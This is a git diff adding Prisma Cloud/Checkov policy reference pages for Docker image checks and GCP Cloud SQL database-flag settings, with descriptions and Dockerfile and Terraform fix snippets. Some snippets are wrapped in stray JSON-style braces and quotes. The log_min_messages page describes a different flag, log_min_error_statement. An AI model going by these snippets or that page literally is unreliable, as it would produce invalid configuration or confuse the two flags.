+ +=== Fix - Buildtime + + +*Dockerfile* + + +[,Dockerfile] +---- +- ADD config.txt /app/ +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-healthcheck-instructions-have-been-added-to-container-images.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-healthcheck-instructions-have-been-added-to-container-images.adoc new file mode 100644 index 000000000..969839cb0 --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-healthcheck-instructions-have-been-added-to-container-images.adoc @@ -0,0 +1,54 @@ +== Healthcheck instructions have not been added to container images + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2457c548-1ac6-4f6e-a6e5-d6a1ad318720 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/HealthcheckExists.py[CKV_DOCKER_2] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +We recommend that you add the HEALTHCHECK instruction to your Docker container images to ensure that health checks are executed against running containers. +An important security control is that of availability. +Adding the HEALTHCHECK instruction to your container image ensures that the Docker engine periodically checks the running container instances against that instruction to ensure that containers are still operational. +Based on the results of the health check, the Docker engine could terminate containers which are not responding correctly, and instantiate new ones. 
+
+=== Fix - Buildtime
+
+
+*Docker*
+
+
+
+
+[source,dockerfile]
+----
+{
+ "FROM base
+
+LABEL foo="bar baz"
+USER me
+HEALTHCHECK CMD curl --fail http://localhost:3000 || exit 1",
+}
+----
+
diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-label-maintainer-is-used-instead-of-maintainer-deprecated.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-label-maintainer-is-used-instead-of-maintainer-deprecated.adoc
new file mode 100644
index 000000000..4a19f85d1
--- /dev/null
+++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-label-maintainer-is-used-instead-of-maintainer-deprecated.adoc
@@ -0,0 +1,44 @@
+== LABEL maintainer is used instead of MAINTAINER (deprecated)
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 395cad1d-c9ff-4c55-a199-45cd2eba6d6c
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/MaintainerExists.py[CKV_DOCKER_6]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Docker
+
+|===
+
+
+
+=== Description
+
+
+The LABEL instruction is more flexible and is the recommended replacement for the deprecated MAINTAINER instruction in a Dockerfile.
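For example (the maintainer name and address are placeholders), the deprecated instruction maps directly onto a label:

```dockerfile
# Hypothetical sketch: a maintainer label replaces the deprecated MAINTAINER
FROM alpine:3.18
LABEL maintainer="Jane Doe <jane.doe@example.com>"
```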
+ +=== Fix - Buildtime + + +*Docker* + + +[,Dockerfile] +---- +FROM base +- MAINTAINER bad +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-the-base-image-uses-a-non-latest-version-tag.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-the-base-image-uses-a-non-latest-version-tag.adoc new file mode 100644 index 000000000..78d94740d --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-the-base-image-uses-a-non-latest-version-tag.adoc @@ -0,0 +1,47 @@ +== Base image uses a latest version tag + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4a5d5094-4d50-4844-8ebe-d0dbda6f607a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/ReferenceLatestTag.py[CKV_DOCKER_7] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +When possible, it is recommended to pin the version for the base image in your Dockerfiles. +There are a number of potential issues that may be caused when using the `latest` tag. +Since `latest` is the default tag when a tag is not specified, it does not automatically refer to the latest version of the image. +This can lead to the use of outdated images and in the case of production deployments, using a dynamic version can cause unexpected behavior and difficulty in determining which version is being currently used. 
+It is best practice to be as specific as possible about what is running, to make operations predictable and reliable.
+
+=== Fix - Buildtime
+
+
+*Dockerfile*
+
+
+[,Dockerfile]
+----
+- FROM alpine:latest
+----
+
diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-the-last-user-is-not-root.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-the-last-user-is-not-root.adoc
new file mode 100644
index 000000000..7d03b8492
--- /dev/null
+++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-the-last-user-is-not-root.adoc
@@ -0,0 +1,45 @@
+== Last USER is root
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| dcbdd1fd-5df0-4800-9d03-5fdbe2a5c401
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/RootUser.py[CKV_DOCKER_8]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Docker
+
+|===
+
+
+
+=== Description
+
+
+Docker containers run with root privileges by default, and so does the application that runs inside the container.
+This is a major security concern, because an attacker who compromises the application running inside the container may be able to gain root access to the Docker host.
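A minimal sketch of this recommendation (the package and user name are illustrative): root may be used for intermediate build steps, but the last `USER` instruction should name an unprivileged account:

```dockerfile
# Hypothetical sketch: root is used mid-build, but the final USER is non-root
FROM alpine:3.18
USER root
RUN apk add --no-cache curl && adduser -D appuser
USER appuser
CMD ["curl", "--version"]
```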
+
+=== Fix - Buildtime
+
+
+*Dockerfile*: Remove `USER root`, or add a non-root `USER` instruction after it.
+
+
+[,Dockerfile]
+----
+FROM base
+- USER root
+----
+
diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-update-instructions-are-not-used-alone-in-the-dockerfile.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-update-instructions-are-not-used-alone-in-the-dockerfile.adoc
new file mode 100644
index 000000000..1e5abae21
--- /dev/null
+++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-update-instructions-are-not-used-alone-in-the-dockerfile.adoc
@@ -0,0 +1,58 @@
+== Update instructions are used alone in a Dockerfile
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 7cc86b56-dbe0-45a4-98d0-1b982cbce03c
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/UpdateNotAlone.py[CKV_DOCKER_5]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Docker
+
+|===
+
+
+
+=== Description
+
+
+You should not use OS package manager update instructions such as `apt-get update` or `yum update` either alone or in a single line in the Dockerfile.
+Adding update instructions in a single line in the Dockerfile will cause the update layer to be cached.
+When you then build any image later using the same instruction, this will cause the previously cached update layer to be used, potentially preventing any fresh updates from being applied to later builds.
+ +=== Fix - Buildtime + + +*Docker* + + + + +[source,dockerfile] +---- +{ + "FROM base + +RUN apt-get update \\ + && apt-get install -y --no-install-recommends foo \\ + && echo gooo + +RUN apk update \\ + && apk add --no-cache suuu looo + +RUN apk --update add moo", +} +---- + diff --git a/code-security/policy-reference/get-started-code-sec-policies/get-started-code-sec-policies.adoc b/code-security/policy-reference/get-started-code-sec-policies/get-started-code-sec-policies.adoc new file mode 100644 index 000000000..687b7504c --- /dev/null +++ b/code-security/policy-reference/get-started-code-sec-policies/get-started-code-sec-policies.adoc @@ -0,0 +1,10 @@ +== Prisma Cloud Code Security Policy Reference + +Prisma Cloud Code Security offers a comprehensive scanning mechanism for detecting potential security issues that may arise in various aspects of software development. The scanning process is designed to cover a wide range of areas such as infrastructure as code, open source packages, and secrets security. + +On Prisma Cloud, a policy is a set of one or more constraints or conditions that must be adhered to. Prisma Cloud provides predefined policies for configurations and access controls that adhere to established security best practices. These Prisma Cloud policies are shipped out-of-the-box and cannot be modified. +If you want to create custom policies for build-time checks, see https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin-code-security/scan-monitor/custom-build-policies[custom build policies]. + +This documentation includes information about the specific reasons for a policy violation, as well as actionable suggestions for resolving any issues that were detected during the code scanning process. The documentation also provides links to the Checkov repository for the code that represents the policy. 
+While some of the configuration policies in this document enable you to perform checks in the run and build phase of your resource deployment, the details in this documentation are only for the build phase of the policy.
+On the Prisma Cloud management console, if you want to find all policies available for the build phase, set the search filter for *Policy Sub Type* to *Build*. See https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin/prisma-cloud-policies/manage-prisma-cloud-policies.html[manage policies] for details.
diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-1.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-1.adoc
new file mode 100644
index 000000000..3f52538b5
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-1.adoc
@@ -0,0 +1,108 @@
+== GCP MySQL instance with local_infile database flag is not disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 558185cd-8704-4709-8bea-e6c692f26d00
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py[CKV_GCP_50]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+The *local_infile* database flag controls the server-side LOCAL capability for LOAD DATA statements.
+Depending on the *local_infile* setting, the server refuses or permits local data loading by clients that have LOCAL enabled on the client side.
+To explicitly cause the server to refuse LOAD DATA LOCAL statements start *mysqld* with *local_infile* disabled, regardless of how client programs and libraries are configured at build time or runtime.
+*local_infile* can also be set at runtime.
+We recommend you set the *local_infile* database flag for a Cloud SQL MySQL instance to *off* to address the security issues associated with the flag.
+
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*: To change the policy using the GCP Console, follow these steps:
+
+
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances].
+
+. Select the *MySQL instance* where the database flag needs to be enabled.
+
+. Click *Edit*.
+
+. Scroll down to the *Flags* section.
+
+. To set a flag that has not been set on the instance before, click *Add item*.
+
+. Select the flag *local_infile* from the drop-down menu, and set its value to *off*.
+
+. Click *Save*.
+
+. Confirm the changes in the *Flags* section on the *Overview* page.
+
+
+*CLI Command*
+
+
+
+. List all Cloud SQL database instances using the following command: `gcloud sql instances list`
+
+. Configure the local_infile database flag for every Cloud SQL MySQL database instance using the following command: `gcloud sql instances patch INSTANCE_NAME --database-flags local_infile=off`
++
+NOTE: This command will overwrite all database flags previously set. To keep those flags, and add new ones, include the values for all flags to be set on the instance. Any flag not specifically included is set to its default value.
+For flags that do not take a value, specify the flag name followed by an equals sign (*=*).
+ +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_sql_database_instance +* *Arguments:* database_version = "MYSQL_* " settings::database_flags: key:"local_infile", value: by default set to "on" + + +[source,go] +---- +{ + "resource "google_sql_database_instance" "default" { + name = "master-instance" + database_version = "MYSQL_8_0" + region = "us-central1" + + settings { ++ database_flags { ++ name = "local_infile" ++ value = "off" + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-10.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-10.adoc new file mode 100644 index 000000000..0aed396d1 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-10.adoc @@ -0,0 +1,116 @@ +== GCP SQL Server instance database flag 'contained database authentication' is enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7e105686-9939-48e8-8e76-bfdf42b75ef6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py[CKV_GCP_59] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +A contained database includes all database settings and metadata required to define the database. +It has no configuration dependencies on the instance of the Database Engine where the database is installed. +Users can connect to the database without authenticating a login at the Database Engine level. +Isolating the database from the Database Engine makes it possible to easily move the database to another instance of SQL Server. +Contained databases have some unique threats that should be understood and mitigated by SQL Server Database Engine administrators. 
+Most of the threats are related to the USER WITH PASSWORD authentication process, which moves the authentication boundary from the Database Engine level to the database level.
+We recommend you ensure the *contained database authentication* database flag for SQL Server database instances is disabled.
+To achieve this, set the value to *Off*.
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*: To change the policy using the GCP Console, follow these steps:
+
+
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances].
+
+. Select the *SQL Server instance* where the database flag needs to be enabled.
+
+. Click *Edit*.
+
+. Scroll down to the *Flags* section.
+
+. To set a flag that has not been set on the instance before, click *Add item*.
+
+. Select the flag *contained database authentication* from the drop-down menu, and set its value to *Off*.
+
+. Click *Save*.
+
+. Confirm the changes in the *Flags* section on the *Overview* page.
+
+
+*CLI Command*
+
+
+
+. List all Cloud SQL database instances using the following command: `gcloud sql instances list`
+
+. Configure the *contained database authentication* database flag for every Cloud SQL SQL Server database instance using the following command:
+----
+gcloud sql instances patch INSTANCE_NAME
+--database-flags "contained database authentication=off"
+----
++
+NOTE: This command will overwrite all database flags previously set. To keep these flags, and add new ones, include the values for all flags to be set on the instance.
+Any flag not specifically included is set to its default value.
+For flags that do not take a value, specify the flag name followed by an equals sign (*=*).
+
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_sql_database_instance
+
+* *Arguments:* database_version = "SQLSERVER_* " settings::database_flags: key:"contained database authentication", value: by default set to "on"
+
+
+[source,go]
+----
+resource "google_sql_database_instance" "default" {
+  name             = "master-instance"
+  database_version = "SQLSERVER_2017_STANDARD"
+  region           = "us-central1"
+
+  settings {
+    database_flags {
+      name  = "contained database authentication"
+      value = "off"
+    }
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-11.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-11.adoc
new file mode 100644
index 000000000..204550af8
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-11.adoc
@@ -0,0 +1,93 @@
+== GCP Cloud SQL database instances have public IPs
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 9de130c6-1748-421c-b2c1-c8ad6f601912
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py[CKV_GCP_60]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+To lower the organization's attack surface, Cloud SQL databases should not have public IPs.
+Private IPs provide improved network security and lower latency for your application.
+We recommend you configure Second Generation SQL instances to use private IPs instead of public IPs.
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*: To change the policy using the GCP Console, follow these steps:
+
+
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/sql/instances[Cloud SQL Instances].
+
+. Click the instance name to open its *Instance details* page.
+
+. 
Select *Connections*.
+
+. Clear the *Public IP* checkbox.
+
+. To update the instance, click *Save*.
+
+
+*CLI Command*
+
+
+
+. For every instance remove its public IP and assign a private IP instead: `gcloud beta sql instances patch INSTANCE_NAME --network=VPC_NETWORK_NAME --no-assign-ip`
+
+. Confirm the changes using the following command: `gcloud sql instances describe INSTANCE_NAME`
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_sql_database_instance
+* *Arguments:* database_version = "SQLSERVER_* " settings::ip_configuration: by default set to "true"
+
+
+[source,go]
+----
+resource "google_sql_database_instance" "default" {
+  name             = "master-instance"
+  database_version = "SQLSERVER_2017_STANDARD"
+  region           = "us-central1"
+
+  settings {
+    ip_configuration {
+      # Disabling the public IPv4 address requires a private network
+      # (VPC) to be configured for the instance.
+      ipv4_enabled = false
+    }
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-2.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-2.adoc
new file mode 100644
index 000000000..4b33150b3
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-2.adoc
@@ -0,0 +1,107 @@
+== GCP PostgreSQL instance with log_checkpoints database flag is disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 6058e452-648f-44d3-a6c0-4e3616f11210
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py[CKV_GCP_51]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Enabling *log_checkpoints* causes checkpoints and restart points to be logged in the server log.
+Some statistics are included in the log messages, including the number of buffers written, and the time spent writing them.
+This parameter can only be set in the *postgresql.conf* file or on the server command line.
+We recommend you set the *log_checkpoints* database flag for the Cloud SQL PostgreSQL instance to *on*.
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*: To change the policy using the GCP Console, follow these steps:
+
+
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/sql/instances[Cloud SQL Instances].
+
+. Select the *PostgreSQL instance* where the database flag needs to be enabled.
+
+. Click *Edit*.
+
+. Scroll down to the *Flags* section.
+
+. To set a flag that has not been set on the instance before, click *Add item*.
+
+. Select the flag *log_checkpoints* from the drop-down menu, and set its value to *On*.
+
+. Click *Save*.
+
+. Confirm the changes in the *Flags* section on the *Overview* page.
+
+
+*CLI Command*
+
+
+
+. List all Cloud SQL database instances using the following command: `gcloud sql instances list`
+
+. Configure the `log_checkpoints` database flag for every Cloud SQL PostgreSQL database instance using the following command: `gcloud sql instances patch INSTANCE_NAME --database-flags log_checkpoints=on`
++
+NOTE: This command will overwrite all previously set database flags. To keep those flags, and add new ones, include the values for all flags to be set on the instance.
+Any flag not specifically included is set to its default value.
+For flags that do not take a value, specify the flag name followed by an equals sign (*=*).
+
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_sql_database_instance
+* *Arguments:* database_version = "POSTGRES_* " settings::database_flags: key:"log_checkpoints", value: by default set to "off"
+
+
+[source,go]
+----
+resource "google_sql_database_instance" "default" {
+  name             = "master-instance"
+  database_version = "POSTGRES_11"
+  region           = "us-central1"
+
+  settings {
+    database_flags {
+      name  = "log_checkpoints"
+      value = "on"
+    }
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-3.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-3.adoc
new file mode 100644
index 000000000..b9c431540
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-3.adoc
@@ -0,0 +1,110 @@
+== GCP PostgreSQL instance database flag log_connections is disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| ae01f28b-cfee-4c1d-b089-0cd0c1151f0d
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py[CKV_GCP_52]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+PostgreSQL does not log attempted connections by default.
+Enabling the *log_connections* setting creates log entries for each attempted connection to the server, along with successful completion of client authentication.
+This information can be useful in troubleshooting issues and in determining any unusual connection attempts to the server.
+We recommend you set the *log_connections* database flag for Cloud SQL PostgreSQL instances to *on*.
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*: To change the policy using the GCP Console, follow these steps:
+
+
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. 
Navigate to https://console.cloud.google.com/sql/instances[Cloud SQL Instances].
+
+. Select the *PostgreSQL instance* for which you want to enable the database flag.
+
+. Click *Edit*.
+
+. Scroll down to the *Flags* section.
+
+. To set a flag that has not been set on the instance before, click *Add item*.
+
+. Select the flag *log_connections* from the drop-down menu, and set the value to *on*.
+
+. Click *Save*.
+
+. Confirm the changes in the *Flags* section on the *Overview* page.
+
+
+*CLI Command*
+
+
+
+. List all Cloud SQL database instances using the following command: `gcloud sql instances list`
+
+. Configure the log_connections database flag for every Cloud SQL PostgreSQL database instance using the following command: `gcloud sql instances patch INSTANCE_NAME --database-flags log_connections=on`
++
+NOTE: This command will overwrite all previously set database flags. To keep those and add new ones, include the values for all flags to be set on the instance.
+Any flag not specifically included is set to its default value.
+For flags that do not take a value, specify the flag name followed by an equals sign (*=*).
+
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_sql_database_instance
+* *Arguments:* database_version = "POSTGRES_* " settings::database_flags: key:"log_connections", value: by default set to "off"
+
+
+[source,go]
+----
+resource "google_sql_database_instance" "default" {
+  name             = "master-instance"
+  database_version = "POSTGRES_11"
+  region           = "us-central1"
+
+  settings {
+    database_flags {
+      name  = "log_connections"
+      value = "on"
+    }
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-4.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-4.adoc
new file mode 100644
index 000000000..92464b00a
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-4.adoc
@@ -0,0 +1,108 @@
+== GCP PostgreSQL instance database flag log_disconnections is disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 286e7808-c15c-4759-a0c4-759298ee7769
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py[CKV_GCP_53]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Enabling the *log_disconnections* database flag logs the end of each session, including the session duration.
+PostgreSQL does not log session details by default, including duration and session end details.
+Enabling the *log_disconnections* database flag creates log entries at the end of each session, useful when troubleshooting issues and determining unusual activity across a time period.
+The *log_disconnections* and *log_connections* work hand in hand and usually the pair would be enabled/disabled together.
+We recommend you set the *log_disconnections* flag for a PostgreSQL instance to *On*.
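+
+Because the two flags are usually toggled as a pair, they can be enabled together on the same instance. The following Terraform sketch is illustrative only (the instance name, version, and region are placeholders, not values required by the policy):
+
+[source,go]
+----
+resource "google_sql_database_instance" "default" {
+  name             = "master-instance"
+  database_version = "POSTGRES_11"
+  region           = "us-central1"
+
+  settings {
+    # Log both session start (log_connections) and
+    # session end (log_disconnections) events.
+    database_flags {
+      name  = "log_connections"
+      value = "on"
+    }
+    database_flags {
+      name  = "log_disconnections"
+      value = "on"
+    }
+  }
+}
+----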
+ +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances]. + +. Select the * PostgreSQL instance* where the database flag needs to be enabled. + +. Click * Edit*. + +. Scroll down to the * Flags* section. + +. To set a flag that has not been set on the instance before, click * Add item*. + +. Select the flag * log_disconnections* from the drop-down menu, and set its value to * On*. + +. Click * Save*. + +. Confirm the changes in the * Flags* section on the * Overview* page. + + +* CLI Command* + + + +. List all Cloud SQL database Instances using the following command: `gcloud sql instances list` + +. Configure the log_disconnections database flag for every Cloud SQL PosgreSQL database instance using the below command: `gcloud sql instances patch INSTANCE_NAME --database-flags log_disconnections=on` ++ +NOTE: This command will overwrite all previously set database flags. To keep those flags, and add new ones, include the values for all flags to be set on the instance. +Any flag not specifically included is set to its default value. +For flags that do not take a value, specify the flag name followed by an equals sign (*=*). 
+
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_sql_database_instance
+* *Arguments:* database_version = "POSTGRES_* " settings::database_flags: key:"log_disconnections", value: by default set to "off"
+
+
+[source,go]
+----
+resource "google_sql_database_instance" "default" {
+  name             = "master-instance"
+  database_version = "POSTGRES_11"
+  region           = "us-central1"
+
+  settings {
+    database_flags {
+      name  = "log_disconnections"
+      value = "on"
+    }
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-5.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-5.adoc
new file mode 100644
index 000000000..75da81872
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-5.adoc
@@ -0,0 +1,109 @@
+== GCP PostgreSQL instance database flag log_lock_waits is disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 9570d08f-1795-493f-b88d-7a7a68078ff6
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py[CKV_GCP_54]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Deadlock timeout defines the time to wait on a lock before checking for any conditions.
+Frequent runovers on deadlock timeout can be an indication of an underlying issue.
+Log these waits on locks using the *log_lock_waits* database flag and use the information to identify poor performance due to locking delays, or if a specially-crafted SQL is attempting to starve resources through holding locks for excessive amounts of time.
+We recommend you set the *log_lock_waits* flag for a PostgreSQL instance to *On*.
+This will create a log for any session and allow you to identify waits that take longer than the allotted *deadlock_timeout* time to acquire a lock. + +//// +=== Fix - Runtime +Remediation + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances]. + +. Select the * PostgreSQL instance* where the database flag needs to be enabled. + +. Click * Edit*. + +. Scroll down to the * Flags* section. + +. To set a flag that has not been set on the instance before, click * Add item*. + +. Select the flag * log_lock_waits* from the drop-down menu, and set its value to * On*. + +. Click * Save*. + +. Confirm the changes in the * Flags* section on the * Overview* page. + + +* CLI Command* + + + +. List all Cloud SQL database instances using the following command: `gcloud sql instances list` + +. Configure the log_lock_waits database flag for every Cloud SQL PosgreSQL database instance using the below command: `gcloud sql instances patch INSTANCE_NAME --database-flags log_lock_waits=on` ++ +NOTE: This command will overwrite all database flags previously set. To keep these flags, and add new ones, include the values for all flags to be set on the instance. +Any flag not specifically included is set to its default value. +For flags that do not take a value, specify the flag name followed by an equals sign (*=*). 
+
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_sql_database_instance
+* *Arguments:* database_version = "POSTGRES_* " settings::database_flags: key:"log_lock_waits", value: by default set to "off"
+
+
+[source,go]
+----
+resource "google_sql_database_instance" "default" {
+  name             = "master-instance"
+  database_version = "POSTGRES_11"
+  region           = "us-central1"
+
+  settings {
+    database_flags {
+      name  = "log_lock_waits"
+      value = "on"
+    }
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-6.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-6.adoc
new file mode 100644
index 000000000..1c068c7a2
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-6.adoc
@@ -0,0 +1,116 @@
+== GCP PostgreSQL instance database flag log_min_messages is not set
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 86150e32-f69c-400b-9bc2-444b03795545
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py[CKV_GCP_55]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+The *log_min_error_statement* database flag defines the minimum message severity level that is considered to be an error statement.
+Messages for error statements are logged with the SQL statement.
+Valid values include: DEBUG5, DEBUG4, DEBUG3, DEBUG2, DEBUG1, INFO, NOTICE, WARNING, ERROR, LOG, FATAL, and PANIC.
+Each severity level includes subsequent levels.
+We recommend you set the *log_min_error_statement* flag for PostgreSQL database instances in accordance with your organization's logging policy for auditing purposes.
+Auditing helps you troubleshoot operational problems, and also permits forensic analysis.
+If *log_min_error_statement* is not set to the correct value, messages may not be classified as error messages appropriately.
+Considering general log messages as error messages would make it difficult to find actual errors, while considering only stricter severity levels as error messages may skip actual errors to log their SQL statements.
+
+NOTE: To effectively turn off logging failing statements, set this parameter to PANIC.
